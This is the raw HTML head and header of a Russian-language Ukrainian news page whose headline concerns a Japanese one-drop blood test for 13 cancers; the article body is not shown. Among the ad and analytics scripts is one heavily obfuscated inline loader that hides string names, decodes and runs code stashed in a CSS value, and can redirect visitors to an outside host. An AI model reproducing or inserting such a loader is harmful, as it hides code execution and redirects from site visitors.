<!DOCTYPE html><html prefix="og: http://ogp.me/ns#" lang="ru"><head><title>Японцы создали тест, позволяющий определить 13 видов рака по одной капле крови | Экономические Новости</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0"/> <meta name="referrer" content="origin"><meta name="yandex-verification" content="9a28c4c473219914" /><meta name="yandex-verification" content="9a28c4c473219914" /><meta name="msvalidate.01" content="B41426C32883F1040781CF3774D685FD" /> <meta property="og:title" content="Японцы создали тест, позволяющий определить 13 видов рака по одной капле крови "/><meta property="og:site_name" content="enovosty. Украинские новости дня"/><meta property="og:image" content="https://enovosty.com/wp-content/uploads/2019/11/analys.jpg"/><meta property="og:type" content="article" /><meta property="og:image:width" content="460" /><meta property="og:image:height" content="307" /><meta property="og:image:alt" content="Японцы создали тест, позволяющий определить 13 видов рака по одной капле крови " /><meta name="google-site-verification" content="lQg1PFdRt2LbXcwJ8zsQT5ZnqQEsNPh4d7LwEmOU_lU" /><style>.toparticles{position:relative}.toparticles #photoPromo{height:216px;width:466px;overflow:hidden}.toparticles #photoPromo li{height:216px}.toparticles div.anythingSlider .anythingControls{display:block}</style><link rel="icon" href="https://enovosty.com/favicon.ico" type="image/x-icon" /><link rel="apple-touch-icon" sizes="144x144" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-144x144.png"> <link rel="apple-touch-icon" sizes="114x114" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-114x114.png"> <link rel="apple-touch-icon" sizes="72x72" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-72x72.png"> <link rel="apple-touch-icon" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-57x57.png"><link rel="apple-touch-icon-precomposed" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-57x57.png" /><style>@font-face{font-family:"sw-icon-font";src:url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.eot?ver=3.6.0");src:url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.eot?ver=3.6.0#iefix") format("embedded-opentype"),url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.woff?ver=3.6.0") format("woff"),url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.ttf?ver=3.6.0") format("truetype"),url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.svg?ver=3.6.0#1445203416") format("svg");font-weight:normal;font-style:normal}</style><link rel='stylesheet' id='mo_openid_admin_settings_style-css' href='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/css/mo_openid_style.css?version=5.0.6' type='text/css' media='all' /><link rel='stylesheet' id='mo_openid_admin_settings_phone_style-css' href='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/css/phone.css' type='text/css' media='all' /><link rel='stylesheet' id='mo-wp-bootstrap-social-css' href='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/css/bootstrap-social.css' type='text/css' media='all' /><link rel='stylesheet' id='mo-wp-bootstrap-main-css' href='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/css/bootstrap.min-preview.css' type='text/css' media='all' /><link rel='stylesheet' id='mo-wp-font-awesome-css' href='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/css/font-awesome.min.css?version=4.8' type='text/css' media='all' /><link rel='stylesheet' id='bootstrap_style_ass-css' href='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/css/bootstrap-tour-standalone.css?version=5.1.4' type='text/css' media='all' /><link rel='stylesheet' id='wp-block-library-css' href='https://enovosty.com/wp-includes/css/dist/block-library/style.min.css' type='text/css' media='all' /><link rel='stylesheet' id='wbcr-comments-plus-url-span-css' href='https://enovosty.com/wp-content/plugins/clearfy/components/comments-plus/assets/css/url-span.css' type='text/css' media='all' /><link rel='stylesheet' id='social_warfare-css' href='https://enovosty.com/wp-content/plugins/social-warfare/assets/css/style.min.css' type='text/css' media='all' /><link rel='stylesheet' id='msl-main-css' href='https://enovosty.com/wp-content/plugins/master-slider/public/assets/css/masterslider.main.css' type='text/css' media='all' /><script type='text/javascript' src='https://enovosty.com/wp-includes/js/jquery/jquery.js'></script><script type='text/javascript' src='https://enovosty.com/wp-includes/js/jquery/jquery-migrate.min.js'></script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/js/jquery.cookie.min.js'></script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/js/social_login.js'></script><meta name="description" content="Японские исследователи создали уникальную методику, позволяющую в 99% случаев выявить онкологическую болезнь." /><meta property="og:description" content="Японские исследователи создали уникальную методику, позволяющую в 99% случаев выявить онкологическую болезнь." /><meta name="keywords" content="кровь,рак,японцы,здоровье" /><link rel="canonical" href="https://enovosty.com/zdorove/full/2611-yaponcy-sozdali-test-pozvolyayushhij-opredelit-13-vidov-raka-po-odnoj-kaple-krovi" /><meta property="og:url" content="https://enovosty.com/zdorove/full/2611-yaponcy-sozdali-test-pozvolyayushhij-opredelit-13-vidov-raka-po-odnoj-kaple-krovi" /><style>.ms-parent-id-4 > .master-slider{background:#000000}.ms-parent-id-3 > .master-slider{background:#000000}.ms-parent-id-2 > .master-slider{background:#000000}.ms-parent-id-1 > .master-slider{background:#000000}</style><script>var ms_grabbing_curosr = 'https://enovosty.com/wp-content/plugins/master-slider/public/assets/css/common/grabbing.cur', ms_grab_curosr = 'https://enovosty.com/wp-content/plugins/master-slider/public/assets/css/common/grab.cur';</script><meta name="generator" content="MasterSlider 3.1.1 - Responsive Touch Image Slider | www.avt.li/msf" /><style>.wp-polls .pollbar{margin:1px;font-size:6px;line-height:8px;height:8px;background-image:url('https://enovosty.com/wp-content/plugins/wp-polls/images/default/pollbg.gif');border:1px solid #c8c8c8}</style><link rel="amphtml" href="https://enovosty.com/zdorove/full/2611-yaponcy-sozdali-test-pozvolyayushhij-opredelit-13-vidov-raka-po-odnoj-kaple-krovi?amp"><meta name="fragment" content="!" /><script type="text/javascript">ajaxurl = '/wp-admin/admin-ajax.php';gpid = '4783776';cpage = ''
</script><style>span.swp_share,i.swp_facebook_icon,i.swp_twitter_icon,i.swp_linkedin_icon,span.swp_count{color:#ffffff}table.social{width:50%!important}.swp_share_button{height:max-content!important}.swp_social_panel{margin-bottom:0px!important;margin-top:0px!important}</style><link rel="preload" as="style" disabled type="text/css" rel="stylesheet" href="https://enovosty.com/wp-content/themes/eizvestia/mainstyle.css" /><script type="text/javascript">!function(){var mt="",t="Tag",e="natural",vt="src",st="loader",r="arg",pt="style",gt="text",n="ready",ht=":",a="STC",yt="script",o="image",i="parent",c="append",u="By",l="?",bt="IFRAME",f="add",d="*",A="Name",wt="code",m="Listener",v="no",s="https",p="m",g="Int",h="bold",y="green",b="c",St="_",Ct="write",w="Window",S="Timeout",C="al",Et="call",E="background",M="set",O="IAAAAUEBAAAACw",k="from",Mt="FRAME",B="has",Ot="href",D="Uza",kt="Document",I="create",Bt="Node",F="Of",R="AAA",j="remove",Dt="java",N="Computed",Q="2",It="bind",T="com",Z=".",x=";",Ft="cookie",Rt="close",H="base",L="GODlh",U="query",q="Property",z="HM",G='"',J="weight",jt="substr",Nt="warn",P="Selector",Qt="floor",W="parse",X="Storage",Y="d1e",_="timeout",Tt="id",Zt="cdn",xt="location",Ht="document",K="AAAQABAAACAk",V="Height",Lt="random",Ut="type",qt="head",zt="Em",$="ttt",tt="Loaded",et="Event",rt=")",Gt="Image",Jt="loading",nt="%",Pt="&",Wt="name",at="S",Xt="length",ot="@import",it="local",ct="font",Yt=",",ut="Style",lt="Descriptor",ft="'",dt="Child",At="color",_t="get",Kt="1",Vt=" ",$t="ZZZ2m",te="data",ee="gif",re="Own",ne="debug",ae="Math",oe="Item",ie="Content",ce="link",ue="complete",le="load",fe="Attribute",de="(",Ae="=",me="AQABA",ve="Elements",se="replace",pe="DOMContent",ge="match",he="content",ye="NO",be="key",we="/",Se="f4FFv",Ce="State",Ee="R1cj",Me="Element",Oe="atob",ke="-",Be="MSStream",De="<",Ie="Object",Fe="opener",Re="R0l",je=">",Ne="disabled",Qe="console",Te="r",Ze="index",xe="QBADs",He="prototype",Le="YXJnb24",Ue="All",qe=$+$t,ze=te+ht+o+we+ee+x+H,Ge=(Yt=Yt,O+R),Je=Re+L+me,Pe=K+xe+Ae,We=C+Ee+D+z+Ae,Xe=(St=St,De+ye),Ye=at+je,_e=I+Me,Ke=_t+ve+u+t+A,Ve=c+dt,$e=he+w,tr=_t+re+q+lt,er=n+Ce,rr=f+et+m,nr=U+P+Ue,ar=j+dt,or=M+S,ir=W+g,cr=_t+N+ut,ur=Le+Ae,lr=Q+Ae+Kt,fr=nt+b,dr=At+ht+y+x+ct+ke+J+ht+h,Ar=it+X,mr=_t+oe,vr=Ze+F,sr=Y+Ae,pr=j+oe,gr=s+ht+we+we,hr=Z+T+we+l+Te+Ae,yr=(Pt=Pt,gt+ie),br=de+rt+x,wr=St+p,Sr=B+fe,Cr=ot+Vt+ft,Er=ft+x,Mr=De+pt+je,Or=we+d,kr=d+we,Br=De+we+pt+je,Dr=e+V,Ir=i+Bt,Fr=pe+tt,Rr=le+Vt+r,jr=E+Gt,Nr=G+rt,Qr=(ht=ht,Jt+Vt+k+Vt+a),Tr=a+Vt+_,Zr=v+Vt+a;!function(){var t=window,i=t[Ht],e=Mt,r=ne,n=Dt,c=n+yt,a=wt,o=zt+a,u=0,l=1,f=2,d=3,A=10,m=8*f,v=A*A,s=m*m,p=s*s,g=s*d+d*(m+l),h=qe,y=Se,b=st,w=b+Zt,S=ze+m*f*f+Yt,C=Ge,E=S+Je+C+Pe,M=t[ae][Qt],O=t[ae][Lt],k=function(t){i[Ct](t)},B=u,D=m,I=u,F=u,R=function(){},j=We;try{if(t[Fe][St+h]==y)return t[Fe][St+h]=mt,k(Xe+e+Ye),i[Rt]()}catch(t){}var N=i[_e](bt),Q=i[Ke](qt)[0],T=ot();N[Wt]=T,Q[Ve](N);var Z,x,H,L,U=T?t[T]:N[$e],q=u;try{H=U[Ht]}catch(t){return}try{Z=U[Ie][tr](U[kt][He],er)[_t][It](i),x=H[_e][It](i),L=U[Oe],j=L(j),q=!!U[Be]}catch(t){q=l}if(q)return ut(),ct();var z=new U[Gt],G=H[rr],J=(H[nr][It](i),U[Bt][He]),P=J[Ve],W=J[ar],X=(H[Ke][It](i),U[or][It](t)),Y=U[ir],_=U[cr][It](t),K=x[It](i,yt);k=H[Ct][It](i),M=U[ae][Qt],O=U[ae][Lt];var V=L(ur);H[Ft][ge](V+St+r+lr)&&(R=U[Qe][Nt][It](U[Qe],fr+o,dr)),z[vt]=E;for(var $=U[Ar]||[],tt=0;tt<$[Xt];tt++){var et=$[be](tt);if(Y(et[jt](0,d),m)+mt==et[jt](d)){var rt=$[mr](et);if(rt[Xt]<v&&rt[vr](sr)==u)return $[pr](et),t[xt]=gr+w+hr+t[xt]+Pt+rt}}var nt=ot(),at=K();function ot(){return wr+M(O()*p*p)}function it(t){dt(),B||(F=ut(l),I=ct(l),t())}function ct(t){var e=ft(ce,Ne);return e&&e[Sr](Ot)?lt(Cr+e[Ot]+Er,t):e}function ut(t){var e=ft(yt,Ut,pt);if(e)return lt(e[gt],t)}function lt(t,e){if(k(Mr+t+Or+ot()+kr+Br),e)return ft(pt)}function ft(t,e,r){for(var n=i[Ke](t),a=n[Xt];-1<--a;)if(!e||n[a][Sr](e)&&(!r||n[a][e]==r))return n[a]}function dt(){z[ue]?z[Dr]||(B=l,I&&I[Ir][ar](I),F&&F[Ir][ar](F)):D--&&X(dt,l)}function At(){if(Z()==Jt)return G[Et](i,Fr,At);R(Rr);var t,e=x(pt);e[Tt]=j,P[Et](Q,e);var r=_(e)[jr];if(r[Xt]>v){var n=K(),a=r[jt](g)[se](Nr,mt),o=ot();U[o]=P[It](Q,n),t=a[jt](m*f),W[Et](Q,e),n[yr]=L(t),U[xt]=c+ht+o+br,R(Qr)}else Z()!=ue?(R(Tr),X(At,s)):R(Zr)}t[nt]=it[It](t,At),at[yr]=nt+br,P[Et](Q,at)}()}();</script><link rel="stylesheet" id="like-dislike-css" href="https://enovosty.com/wp-content/plugins/like-dislike-counter-for-posts-pages-and-comments/css/ldc-lite.min.css?v=1&#038;ver=1.0.0" type="text/css" media="all" /><script><!--//--><![CDATA[//><!--
var pp_gemius_identifier = new String('.WeQbWs7d1FI7fa_VrIDknZ233jNFqLPdhORXpDm_jL.27');//--><!]]></script><script async src="https://enovosty.com/wp-content/themes/eizvestia/js/x_gemius.js"></script><script type="text/javascript" src="https://enovosty.com/wp-content/plugins/top-10/top-10-addcount.js.php?top_ten_id=4783776&amp;a=6514" async></script><!--[if lte IE 7]><link rel="stylesheet" href="https://enovosty.com/wp-content/themes/eizvestia/js/jslider/css/anythingslider-ie.css" type="text/css" media="screen" /><![endif]--><script async src="https://enovosty.com/wp-content/themes/eizvestia/js/jslider/js/jquery.anythingslider1.min.js"></script><script async src="https://enovosty.com/wp-content/themes/eizvestia/js/jqvisible.js"></script><script async src="https://enovosty.com/wp-content/themes/eizvestia/js/common.js"></script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/adriver.core.2.ua.min.js"></script><script type="text/javascript">(function () {var w = window,d = document,protocol = /https/i.test(w.location.protocol) ? 'https:' : 'http:',aml = typeof admixerML !== 'undefined' ? admixerML : {};aml.fn = aml.fn || [];aml.invPath = aml.invPath || (protocol + '//inv-nets.admixer.net/');
aml.cdnPath = aml.cdnPath || (protocol + '//cdn.admixer.net/');
aml.noCriteo = true;if (!w.admixerML) {var lodash = document.createElement('script');lodash.id = 'amlScript';lodash.async = true;lodash.type = 'text/javascript';lodash.src = aml.cdnPath + 'scripts3/loader2.js';var node = d.getElementsByTagName('script')[0];node.parentNode.insertBefore(lodash, node);w.admixerML = aml;}})();</script> <meta property="fb:admins" content="100009507220682"/><meta property="fb:app_id" content="2113796585568948"/><script>function setHomepage(){var homepage = 'https://enovosty.com';
if (document.all){document.body.style.behavior='url(#default#homepage)';document.body.setHomePage(homepage);}else if (window.sidebar){if(window.netscape){try{netscape.security.PrivilegeManager.enablePrivilege("UniversalXPConnect");}catch(e){alert("this action was aviod by your browser，if you want to enable，please enter about:config in your address line,and change the value of signed.applets.codebase_principal_support to true");}}var prefs = Components.classes['@mozilla.org/preferences-service;1'].getService(Components. interfaces.nsIPrefBranch);prefs.setCharPref('browser.startup.homepage',homepage);}}</script><script>var _gaq = _gaq || [];var pluginUrl = '//www.google-analytics.com/plugins/ga/inpage_linkid.js';
_gaq.push(['_require', 'inpage_linkid', pluginUrl]);_gaq.push(['_setAccount', 'UA-12467142-3']);_gaq.push(['_addOrganic', 'nova.rambler.ru', 'query']);_gaq.push(['_addOrganic', 'go.mail.ru', 'q']);_gaq.push(['_addOrganic', 'nigma.ru', 's']);_gaq.push(['_addOrganic', 'webalta.ru', 'q']);_gaq.push(['_addOrganic', 'aport.ru', 'r']);_gaq.push(['_addOrganic', 'poisk.ru', 'text']);_gaq.push(['_addOrganic', 'km.ru', 'sq']);_gaq.push(['_addOrganic', 'liveinternet.ru', 'ask']);_gaq.push(['_addOrganic', 'quintura.ru', 'request']);_gaq.push(['_addOrganic', 'search.qip.ru', 'query']);_gaq.push(['_addOrganic', 'gde.ru', 'keywords']);_gaq.push(['_addOrganic', 'gogo.ru', 'q']);_gaq.push(['_addOrganic', 'ru.yahoo.com', 'p']);_gaq.push(['_addOrganic', 'images.yandex.ru', 'q', true]);_gaq.push(['_addOrganic', 'blogsearch.google.ru', 'q', true]);_gaq.push(['_addOrganic', 'blogs.yandex.ru', 'text', true]);_gaq.push(['_setDomainName', 'enovosty.com']);_gaq.push(['_trackPageview']);(function() {var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'https://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);})();</script><script>function trackOutboundLink(link, category, action) {var url = '';if(link.href) url = link.href;if(url == ''){str = link.getAttribute("onclick");m = str.match("(https:\/\/.*?)\'");if(m) url = m[1];}try {_gaq.push(['_trackEvent', category , action]);} catch(err){}setTimeout(function() {}, 100);}</script><script>jQuery(document).ready(function($){$("a").each(function() {var href = $(this).attr("href");var target = $(this).attr("target");var text = $(this).text();var a = new RegExp('/' + window.location.host + '/');var e = /([-a-zA-Z0-9@:%_\+.~#?&\/\/=]{2,256}\.[a-z]{2,4}\b(\/?[-a-zA-Z0-9@:%_\+.~#?&\/\/=]*)?)/gi;var b = new RegExp(e);$(this).click(function(event) {if (this.href && b.test(this.href) && !a.test(this.href) && (href.indexOf("enovosty.com") == -1)) {console.log("document.URL : "+this.href);event.preventDefault();_gaq.push(["_trackEvent", "Links", "Clicked", href, , false]);setTimeout(function() {window.open(href,(!target?"_self":target));},300);}});});});</script><script>(function(){var j=163229,f=false,b=document,c=b.documentElement,e=window;function g(){var a="";a+="rt="+(new Date).getTime()%1E7*100+Math.round(Math.random()*99);a+=b.referrer?"&r="+escape(b.referrer):"";return a}function h(){var a=b.getElementsByTagName("head")[0];if(a)return a;for(a=c.firstChild;a&&a.nodeName.toLowerCase()=="#text";)a=a.nextSibling;if(a&&a.nodeName.toLowerCase()!="#text")return a;a=b.createElement("head");c.appendChild(a);return a}function i(){var a=b.createElement("script");a.setAttribute("type","text/javascript");a.setAttribute("async","true");a.setAttribute("src","https://s.luxadv.com/t/lb"+j+"_3.js?"+g());typeof a!="undefined"&&h().appendChild(a)}function d(){if(!f){f=true;i()}};if(b.addEventListener)b.addEventListener("DOMContentLoaded",d,false);else if(b.attachEvent){c.doScroll&&e==e.top&&function(){try{c.doScroll("left")}catch(a){setTimeout(arguments.callee,0);return}d()}();b.attachEvent("onreadystatechange",function(){b.readyState==="complete"&&d()})}else e.onload=d})();</script><script async src='https://www.googletagservices.com/tag/js/gpt.js'></script><script>var googletag = googletag || {};googletag.cmd = googletag.cmd || [];</script><script>googletag.cmd.push(function() {googletag.defineSlot('/17774365/enovosty.com_300x600', [300, 600], 'div-gpt-ad-1531223757969-0').addService(googletag.pubads());googletag.defineSlot('/17774365/enovosty.com_300x600_2', [300, 600], 'div-gpt-ad-1531304104065-0').addService(googletag.pubads());//googletag.defineSlot('/17774365/enovosty.com_728x90', [728, 90], 'div-gpt-ad-1531223757969-1').addService(googletag.pubads());
googletag.defineSlot('/59256651/ads_ei_468_60', [468, 60], 'div-gpt-ad-1516280158772-0').addService(googletag.pubads());googletag.pubads().enableSingleRequest();googletag.enableServices();});
</script></head><body><script type='text/javascript'>admixerML.fn.push(function() {// Правая колонка - верх
if(/ukr.net/i.test(document.referrer)){admixerML.defineSlot({z: '7af953ae-795d-4e3e-8b55-c1906dcae224', ph: 'admixer_7af953ae795d4e3e8b55c1906dcae224_zone_12623_sect_1082_site_1069',i: 'inv-nets'});} else {admixerML.defineSlot({z: '9743148c-0bcf-416e-8ab5-55d24689e145', ph: 'admixer_9743148c0bcf416e8ab555d24689e145_zone_1845_sect_1082_site_1069', i: 'inv-nets'});};admixerML.defineSlot({z: '9a399316-86c0-4d6c-a6f1-676a36437a90', ph: 'admixer_9a39931686c04d6ca6f1676a36437a90_zone_42132_sect_1082_site_1069', i: 'inv-nets', s:'8b5577c5-d6c8-4102-81da-48ee76305fc9'});admixerML.defineSlot({z: '6c64e196-3fa9-43cf-8c1e-fd800277f90c', ph: 'go2net_6c64e1963fa943cf8c1efd800277f90c_zone_28808_sect_9220_site_7570', i: 'inv-nets', s:'7901bb9a-67fa-4dcd-8ae7-8a34d5bc7852'});// Нигде не выводится

// Статьи/Новости внизу
admixerML.defineSlot({z: '3b1188cc-6614-4215-a9bc-9ecb1d9b44e9', ph:
'admixer_3b1188cc66144215a9bc9ecb1d9b44e9_zone_7939_sect_1082_site_1069', i:
'inv-nets' ,renderedCallback: function(e) {var player = e.ph.childNodes[0].contentWindow &&
e.ph.childNodes[0].contentWindow.player;if (player){player.mute();}}});// Футтер
admixerML.defineSlot({z: '0e893395-4b69-455a-9d7a-6bc8d2aa074f', ph:
'admixer_0e8933954b69455a9d7a6bc8d2aa074f_zone_9056_sect_1082_site_1069', i:
'inv-nets'});
admixerML.defineSlot({z: '5dacd85f-7810-44f5-831a-9a7b2add1a5f', ph: 'admixer_5dacd85f781044f5831a9a7b2add1a5f_zone_23901_sect_1082_site_1069', i: 'inv-nets'});admixerML.singleRequest();});</script><script><!--
bmN=navigator,bmD=document,bmD.cookie='b=b',i=0,bs=[],bm={v:101585,s:101585,t:6,c:bmD.cookie?1:0,n:Math.round((Math.random()* 1000000)),w:0};for(var f=self;f!=f.parent;f=f.parent)bm.w++;try{if(bmN.plugins&&bmN.mimeTypes.length&&(x=bmN.plugins['Shockwave Flash']))bm.m=parseInt(x.description.replace(/([a-zA-Z]|\s)+/,''));else for(var f=3;f<20;f++)if(eval('new ActiveXObject("ShockwaveFlash.ShockwaveFlash.'+f+'")'))bm.m=f}catch(e){;}try{bm.y=bmN.javaEnabled()?1:0}catch(e){;}try{bmS=screen;bm.v^=bm.d=bmS.colorDepth||bmS.pixelDepth;bm.v^=bm.r=bmS.width}catch(e){;}r=bmD.referrer.replace(/^w+:\/\//,'');if(r&&r.split('/')[0]!=window.location.host){bm.f=escape(r).slice(0,400).slice(0,400);bm.v^=r.length}bm.v^=window.location.href.length;for(var x in bm) if(/^[vstcnwmydrf]$/.test(x)) bs[i++]=x+bm[x];bmD.write('<img src="//c.bigmir.net/?'+bs.join('&')+'"  width="0" height="0" alt="bigmir)net TOP 100" title="bigmir)net TOP 100" />');
//--></script><noscript><img src="//c.bigmir.net/?v101585&s101585&t6" width="0" height="0" alt="" title="" /></noscript><div id="fb-root"></div><script>window.fbAsyncInit = function() {FB.init({appId      : '2113796585568948',cookie     : true,xfbml      : true,version    : 'v3.0'
});
FB.AppEvents.logPageView();
};(function(d, s, id){var js, fjs = d.getElementsByTagName(s)[0];if (d.getElementById(id)) {return;}js = d.createElement(s); js.id = id;js.src = "https://connect.facebook.net/en_US/sdk.js";
fjs.parentNode.insertBefore(js, fjs);}(document, 'script', 'facebook-jssdk'));</script><div id="adriver_banner_branding"></div><div class="container"> <div style="margin-top:86px;position:relative;"> <div id="right_ban"></div> <div class="mltlngg_switcher"><span>Рус</span><a href="https://enovosty.com/uk/zdorove-ukr/full/2611-yaponci-stvorili-test-shho-dozvolyaye-viznachiti-13-vidiv-raku-po-odnij-krapli-krovi">Укр</a></div> </div> <div class="cls"></div><div id="header" style="padding-top: 0px; margin-top: 0px;" ><div id="headerTop"><div class="cls"></div></div>   <div id="headerMiddle"><a href="https://enovosty.com/"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/srclogo.png" id="logo" alt="Экономические новости" title="Экономические новости" /></a> <a href="https://enovosty.com/konverter-valyut" class="finmarket">Конвертер валют</a><a href="https://enovosty.com/video" class="videohead">Видео</a><a class="wap" rel="nofollow" href="https://enovosty.com/zdorove/full/2611-yaponcy-sozdali-test-pozvolyayushhij-opredelit-13-vidov-raka-po-odnoj-kaple-krovi?mobile=1"></a><a class="wap-img" title="Мобильная версия сайта" rel="nofollow" href="https://enovosty.com/zdorove/full/2611-yaponcy-sozdali-test-pozvolyayushhij-opredelit-13-vidov-raka-po-odnoj-kaple-krovi?mobile=1"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/wap1.png" alt="Мобильная версия сайта" /></a> <div class="wiget simple" id="curs"><span style="text-align:center;display: block;font-size: 12px;font-weight: 700;"><a style="color: #369;" href="https://enovosty.com/currency-rates">Курсы валют</a></span><div class="header-currency"><a href="https://enovosty.com/currency-rates"><table class="currency"> <tr class="cur_shap"><td>&nbsp;</td><td><strong>Продажа</strong></td><td><strong>Покупка</strong></td><td><strong>НБУ</strong></td> </tr> <tr><td>USD</td><td>24.27</td><td>23.88</td><td>25.14</td> </tr> <tr class="tr_white"><td>EUR</td><td>26.77</td><td>26.20</td><td>27.75</td> </tr> <tr><td>RUB</td><td>0.39</td><td>0.30</td><td>0.38</td> </tr></table></a></div></div><div class="wiget simple" id="fonds"><span style="color: #369;text-align: center;display: block;font-size: 12px;font-weight: 700;">Фондовые индексы</span><table class="currency index"> <tr class="cur_shap"> <td>&nbsp;</td><td><strong>Знач.</strong></td><td><strong>Изм.,&nbsp;%</strong></td><td><strong>Время</strong></td> </tr> <tr> <td>PFTS</td><td>0.00</td><td>0.00</td><td></td> </tr> <tr class="tr_white"> <td>UX</td><td>1511.13</td><td>-0.17</td><td>17:00 26.11.2019</td> </tr> <tr> <td>RTS</td><td>1438.60</td><td>-1.10</td><td>17:10 26.11.2019</td> </tr></table></div><div class="wiget simple" id="toplivo"><span style="color: #369;text-align:center;display: block;font-size: 12px;font-weight: 700;">Стоимость нефти (ICE)</span><table class="currency benzin"><tr class="cur_shap"><td></td><td><strong>$/баррель</strong></td><td><strong>Изм., %</strong></td><td><strong>Дата</strong></td></tr><tr><td style="text-align:left;padding-left: 2px;">BRENT</td><td>64.17</td><td>+0.82</td><td style="text-transform:uppercase;">Nov</td></tr><tr class="tr_white"><td style="text-align:left;padding-left: 2px;">WTI</td><td>67.49</td><td>-0.84</td><td style="text-transform:uppercase;">Aug</td></tr><tr><td style="text-align:left;padding-left: 2px;">GAS OIL</td><td>630.25</td><td>-0.52</td><td style="text-transform:uppercase;">Aug</td></tr></table></div> <div id="header_right"> <a href="https://enovosty.com/rss/rss.xml">RSS</a><a href="https://enovosty.com/afisha" class="h-anonsy"> <img src="https://enovosty.com/wp-content/themes/eizvestia/img/afisha3.png" width="56" alt="Деловая афиша" title="Деловая афиша" />Афиша</a><a class="archive" href="https://enovosty.com/archive">Архив</a><div style="clear: both;vertical-align:top;"> <a href="https://enovosty.com" title="Последние новости - &quot;ЭКОНОМИЧЕСКИЕ НОВОСТИ&quot;" onclick="window.external.AddFavorite(this.href, this.title); return false;" rel="sidebar">Добавить в закладки</a> </div> </div> <div class="cls"></div></div> <div id="mainMenu" data-hover="hover-on-menu"><ul id="ull" class="menu"><li class="menu-item-has-children"><a class="first" href="https://enovosty.com/news" data-hover="hover-on-link">Новости</a><ul class="sub-menu"><li><a href="https://enovosty.com/news_politics">Политика</a></li><li><a href="https://enovosty.com/news_kiev">Киев</a></li><li><a href="https://enovosty.com/news_economy">Экономика</a></li><li><a href="https://enovosty.com/news-finance">Финансы</a></li><li><a href="https://enovosty.com/news_ekskluzive">Эксклюзив</a></li><li><a href="https://enovosty.com/news-markets">Рынки</a></li><li><a href="https://enovosty.com/news_society">Общество</a></li><li><a href="https://enovosty.com/news_abroad">Мир</a></li><li><a href="https://enovosty.com/news_sport">Cпорт</a></li><li><a href="https://enovosty.com/news-culture">Культура</a></li><li><a href="https://enovosty.com/news-auto">Авто</a></li><li><a href="https://enovosty.com/news_incidents">Происшествия</a></li><li><a href="https://enovosty.com/news_technology">Наука и технологии</a></li><li class="current-menu-item"><a href="https://enovosty.com/zdorove">Здоровье</a></li></ul></li><li><a href="https://enovosty.com/politika">Политика</a></li><li><a href="https://enovosty.com/ekonomika">Экономика</a></li><li><a href="https://enovosty.com/finance">Финансы</a></li><li><a href="https://enovosty.com/markets">Рынки</a></li><li><a href="https://enovosty.com/society">Общество</a></li><li><a href="https://enovosty.com/tehnologii">Технологии</a></li><li><a href="https://enovosty.com/auto">Авто</a></li><li ><a href="https://enovosty.com/blogs">Мнения</a></li><li ><a href="https://enovosty.com/person">Досье</a></li><li id="menu-item-4513425_old" ><a href="https://enovosty.com/currency-rates">Курсы валют</a></li><li id="menu-item-4513319" class="menu-item-has-children" style="border-right: 1px solid #fff;"><a href="#">Ещё...</a><ul class="sub-menu"><li><a href="https://enovosty.com/o-proekte">О проекте</a></li><li><a href="https://enovosty.com/author">Авторы</a></li><li><a href="https://enovosty.com/photo-nedeli">Фото недели</a></li><li><a href="https://enovosty.com/presidenty-2019">Кандидаты в президенты 2019</a></li><li><a href="https://enovosty.com/vybory-2019" >Выборы 2019</a></li></ul></li></ul></div><script>jQuery(document).ready(function($){if(jQuery( window ).width() < 606){var touchHover = function() {$('.first').click(function(e){e.preventDefault();var $this = $(this);var onHover = $this.attr('data-hover');var linkHref = $this.attr('href');if (linkHref && $this.hasClass(onHover)) {location.href = linkHref;return false;}$this.toggleClass(onHover);});$('.finance').click(function(e){e.preventDefault();var $this = $(this);var onHover = $this.attr('data-hover');var linkHref = $this.attr('href');if (linkHref && $this.hasClass(onHover)) {location.href = linkHref;return false;}$this.toggleClass(onHover);});};$(document).ready(function() { touchHover(); });}});</script> </div>  <div id="body"><div class="cls"></div><div id="sidebarLeft_n" style="width:210px;"><script>jQuery(document).ready(function($){$('#slider').anythingSlider({ theme : 'minimalist-round', buildStartStop  : false,buildNavigation : false,enableNavigation : false,hashTags : false,autoPlay :true,delay : 8000,autoPlayLocked : true,pauseOnHover : true
});});</script><div class="topnews_single slide"><p style="padding: 0 7px;
font-weight: 700;
font-family: arial,verdana,tahoma;
background: url(/wp-content/themes/eizvestia/img/blueline.jpg) repeat-x;
line-height: 9px;
margin: 2px 0 9px;
text-align: center;"><a href="https://enovosty.com/top-news"><span style="background-color: #fff;
font-size: 12px;
color: #326698;
text-transform: uppercase;
